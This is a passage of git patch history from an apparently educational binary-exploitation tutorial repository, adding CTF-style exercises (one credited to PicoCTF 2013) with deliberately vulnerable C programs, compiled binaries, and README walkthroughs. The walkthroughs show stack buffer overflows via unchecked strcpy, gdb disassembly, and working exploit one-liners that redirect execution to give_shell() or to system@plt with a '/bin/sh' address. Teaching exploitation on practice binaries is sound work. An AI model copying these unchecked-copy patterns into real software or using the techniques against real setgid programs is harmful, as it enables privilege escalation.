$0x0,%eax +... +gdb-peda$ disas vuln +Dump of assembler code for function vuln: + 0x080484e2 <+0>: push %ebp + 0x080484e3 <+1>: mov %esp,%ebp + 0x080484e5 <+3>: sub $0x28,%esp + 0x080484e8 <+6>: mov 0x8(%ebp),%eax + 0x080484eb <+9>: mov %eax,0x4(%esp) + 0x080484ef <+13>: lea -0x18(%ebp),%eax + 0x080484f2 <+16>: mov %eax,(%esp) + 0x080484f5 <+19>: call 0x8048360 + 0x080484fa <+24>: leave + 0x080484fb <+25>: ret +End of assembler dump. +``` +So you might remember from [Tntro 2](../intro-2) that you can overwrite values +on the stack with a `strcpy()` vulnerability. In the lines of `main()` , +control is passed to the function`vuln()`. However, `vuln()` needs to know where to +come back to in `main()` when it finishes. This is called a return address. In +this case, `vuln()` should jump back to 0x0804851b, the instruction right after +`main()` calls `vuln()`. When we get a SEGFAULT that we control, that means +that we've overwritten the return address. What can we do with this? The +possibilites are pretty much endless. You have control over the code's flow, +so maybe we can call some other function, namely `give_shell()` +``` +$ objdump -d overflow2 | grep give_shell +080484ad : +``` +Now that we have the address of a useful function, let's see if we can supply +*our own* return address. First, as you may remember from the last tutorial, +some of these characters aren't printable. We'll need to convert it to an +escape sequence and reverse the order, leaving us with this: "\xad\x84\x04\x08" +Now we can substitute it in! +``` +$ ./overflow2 $(python -c 'print "A"*28 + "\xad\x84\x04\x08"') +$ ls +overflow2 overflow2.c README.md +``` +We now have a shell!' diff --git a/overflow-1/overflow2 b/overflow-1/overflow2 new file mode 100755 index 0000000000000000000000000000000000000000..ef7733524d52ecfaede7103475dad1598017d071 GIT binary patch literal 7504 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 w^c%^;Fom7BU8Js +#include +#include + +/* This never gets called! */ +void give_shell(){ + gid_t gid = getegid(); + setresgid(gid, gid, gid); + system("/bin/sh -i"); +} + +void vuln(char *input){ + char buf[16]; + strcpy(buf, input); +} + +int main(int argc, char **argv){ + if (argc > 1) + vuln(argv[1]); + return 0; +} From 3c72fc5f46b81bcf747182b02f6d528c25d37bf7 Mon Sep 17 00:00:00 2001 From: Bret Date: Tue, 15 Mar 2016 17:50:48 +0000 Subject: [PATCH 12/16] Changes to be committed: modified: README.md --- README.md | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 5a0133d..d601263 100644 --- a/README.md +++ b/README.md @@ -15,9 +15,11 @@ bert88sta #how2exploit_binary -##Introductory tutorials: +##Introductory Tutorials: * [Intro 1: What is a binary, really?](intro-1) * [Intro 2: Screwing around with the stack](intro-2) -#TODO +##Buffer Overflows: + +* [Overflow 1: The power of SEGFAULT](overflow-1) From 0fad3b63d8fa8b52ed7c4232c0293340478706e1 Mon Sep 17 00:00:00 2001 From: Bret Date: Tue, 15 Mar 2016 17:58:04 +0000 Subject: [PATCH 13/16] Changes to be committed: modified: ../README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index d601263..4559e2a 100644 --- a/README.md +++ b/README.md @@ -22,4 +22,4 @@ bert88sta ##Buffer Overflows: -* [Overflow 1: The power of SEGFAULT](overflow-1) +* [1: The power of SEGFAULT](overflow-1) From 97f211724caa84d8a92820758ded8109bbcb2984 Mon Sep 17 00:00:00 2001 From: Bret Date: Tue, 15 Mar 2016 18:25:50 +0000 Subject: [PATCH 14/16] Changes to be committed: new file: README.md new file: overflow new file: overflow.c --- overflow-2/README.md | 1 + overflow-2/overflow | Bin 0 -> 7533 bytes overflow-2/overflow.c | 19 +++++++++++++++++++ 3 files changed, 20 insertions(+) create mode 100644 overflow-2/README.md create mode 100755 overflow-2/overflow create mode 100644 overflow-2/overflow.c diff --git a/overflow-2/README.md b/overflow-2/README.md new file mode 100644 index 0000000..1e5e6e9 --- /dev/null +++ b/overflow-2/README.md @@ -0,0 +1 @@ +#Build your own `system()` diff --git a/overflow-2/overflow b/overflow-2/overflow new file mode 100755 index 0000000000000000000000000000000000000000..f1ae405823b3056b8e6d070db94360a24b78cb13 GIT binary patch literal 7533 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 +#include +#include + +int main(int argc, char **argv) { + if (argc>1) { + gid_t gid = getegid(); + setresgid(gid, gid, gid); + printf("Good thing you don't have /bin/sh\x00"); + printf("\nGood luck getting a shell.\n"); + system("echo You Lose!\n"); + char buf[24]; + strcpy(buf,argv[1]); + return 0; + } + else { + return 0; + } +} From 8985635d47c8d173ae37aca90160274a02d50473 Mon Sep 17 00:00:00 2001 From: Bret Date: Tue, 15 Mar 2016 22:28:58 +0000 Subject: [PATCH 15/16] Changes to be committed: modified: README.md modified: overflow-1/README.md modified: overflow-2/README.md modified: overflow-2/overflow modified: overflow-2/overflow.c --- README.md | 3 +- overflow-1/README.md | 3 ++ overflow-2/README.md | 104 ++++++++++++++++++++++++++++++++++++++++++ overflow-2/overflow | Bin 7533 -> 7533 bytes overflow-2/overflow.c | 2 +- 5 files changed, 110 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 4559e2a..e3b2f05 100644 --- a/README.md +++ b/README.md @@ -13,7 +13,7 @@ want to dual boot? Get a VM.** bert88sta -#how2exploit_binary +#how2exploit_binary: get your hack on. ##Introductory Tutorials: @@ -23,3 +23,4 @@ bert88sta ##Buffer Overflows: * [1: The power of SEGFAULT](overflow-1) +* [2: Build your own `system()`](overflow-2) diff --git a/overflow-1/README.md b/overflow-1/README.md index 9766299..9df4eed 100644 --- a/overflow-1/README.md +++ b/overflow-1/README.md @@ -1,5 +1,8 @@ #The power of SEGFAULT + +**Credit to [PicoCTF 2013](2013.picoctf.com) for problem** + Consider our file for this exercise [overflow2.c](overflow2.c): ```C #include diff --git a/overflow-2/README.md b/overflow-2/README.md index 1e5e6e9..2963573 100644 --- a/overflow-2/README.md +++ b/overflow-2/README.md @@ -1 +1,105 @@ #Build your own `system()` + +Well, life is tough. Unlike in the first overflow exercise, I've made this one +so that you can't just call a specific function and get a shell. However, we'll +try to solve it anyways. + +```C +#include +#include +#include + +int main(int argc, char **argv) { + if (argc>1) { + gid_t gid = getegid(); + setresgid(gid, gid, gid); + printf("Good thing you don't have /bin/sh"); + printf("\nGood luck getting a shell.\n"); + system("echo You Lose!\n"); + char buf[24]; + strcpy(buf,argv[1]); + } + return 0; +} +``` + +Now unlike the last problem, you might notice that there is no call to +`system("/bin/sh")`. This means we're going to have to be a bit more clever. + +Let's take a look at the disassembly to learn a bit more about `system()` +``` +$ gdb -q ./overflow +Reading symbols from ./overflow...(no debugging symbols found)...done. +gdb-peda$ disas main +Dump of assembler code for function main: +... + 0x0804853c <+47>: call 0x8048400 + 0x08048541 <+52>: movl $0x8048620,(%esp) + 0x08048548 <+59>: call 0x8048390 + 0x0804854d <+64>: movl $0x8048642,(%esp) + 0x08048554 <+71>: call 0x80483c0 + 0x08048559 <+76>: movl $0x804865e,(%esp) + 0x08048560 <+83>: call 0x80483d0 +``` +Now what is `system@plt`? This is a crucial part. This binary is dynamically +linked. This means that the binary makes calls to an actual libc file that gets +put into memory. Luckily for us, dynamically linked binaries have PLT stubs. +Since ASLR randomizes libc addresses as well, the binary needs some way to +reliably call the functions it uses. The PLT is a wrapper function for the +actual code in libc. **The PLT is a part of the binary, it's address doesn't +change.** If you call `system@plt`, you'll call `system()`. So how are we going +to do this? Since the PLT is a part of the binary, we'll use objump +``` +$ objdump -d overflow | grep system +080483d0 : + 8048560: e8 6b fe ff ff call 80483d0 +``` + +Now let's try to break the binary. +``` +$ strace ./overflow $(python -c 'print "A"*44') +... +--- SIGSEGV {si_signo=SIGSEGV, si_code=SEGV_MAPERR, si_addr=0x41414141} --- +``` +We get control of `$eip` after 40 bytes. `$eip` is the instruction pointer +register. This is the same as overwriting a return value. It simply means that +we have control over the control flow. Now let's supply our address. +``` +./overflow $(python -c 'print "A"*40 + "\xd0\x83\x04\x08"') +Good thing you don't have /bin/sh +Good luck getting a shell. +You Lose! +sh: 1: ������: not found +Segmentation fault (core dumped) +``` +Now this is really weird. What happened here is that we called `system()`. +We didn't provide any arguments for `system()` so it just pulled some junk from +the stack. Calling a function in an exploit has to take this form: +\[address of function\] \[return address\] \[argument\] + +Now when the programmer wrote this, (I wrote this one :P) he thought he could +be smart and make fun of you for not having a "/bin/sh" string. However, he +didn't realize that by including that string in the code, the string is in the +binary. We can use gdb to find the string! + +``` +$ gdb -q ./overflow +Reading symbols from overflow...(no debugging symbols found)...done. +gdb-peda b*main +Breakpoint 1 at 0x804850d +gdb-peda$ r +Breakpoint 1, 0x0804850d in main () +gdb-peda$ find /bin/sh +Searching for '/bin/sh' in: None ranges +Found 3 results, display max 3 items: +overflow : 0x804863a ("/bin/sh") +overflow : 0x804963a ("/bin/sh") + libc : 0xf7f82a24 ("/bin/sh") +``` + +Now you'll notice that two of these are in the binary. I'll just pick the first +one and run with it. Finally, our finished exploit looks like so: +``` +./overflow $(python -c 'print "A"*40 + "\xd0\x83\x04\x08" + "FAKE" + +"\x3a\x86\x04\x08"') +``` diff --git a/overflow-2/overflow b/overflow-2/overflow index f1ae405823b3056b8e6d070db94360a24b78cb13..59825b7347660f2c8570cffe22418983fa0eb464 100755 GIT binary patch delta 71 zcmV-N0J#6{I_)~Jm;n^=-3PE9^9Kw#r+=7@uWd|{d}M~RtO2A04MK(l21) { gid_t gid = getegid(); setresgid(gid, gid, gid); - printf("Good thing you don't have /bin/sh\x00"); + printf("Good thing you don't have /bin/sh"); printf("\nGood luck getting a shell.\n"); system("echo You Lose!\n"); char buf[24]; From d6bbc21b37a76ab8c91e4c0ddf870c875e9e6ddb Mon Sep 17 00:00:00 2001 From: Bret Date: Tue, 15 Mar 2016 22:30:30 +0000 Subject: [PATCH 16/16] Changes to be committed: modified: README.md --- overflow-2/README.md | 1 + 1 file changed, 1 insertion(+) diff --git a/overflow-2/README.md b/overflow-2/README.md index 2963573..114b3e4 100644 --- a/overflow-2/README.md +++ b/overflow-2/README.md @@ -75,6 +75,7 @@ Segmentation fault (core dumped) Now this is really weird. What happened here is that we called `system()`. We didn't provide any arguments for `system()` so it just pulled some junk from the stack. Calling a function in an exploit has to take this form: + \[address of function\] \[return address\] \[argument\] Now when the programmer wrote this, (I wrote this one :P) he thought he could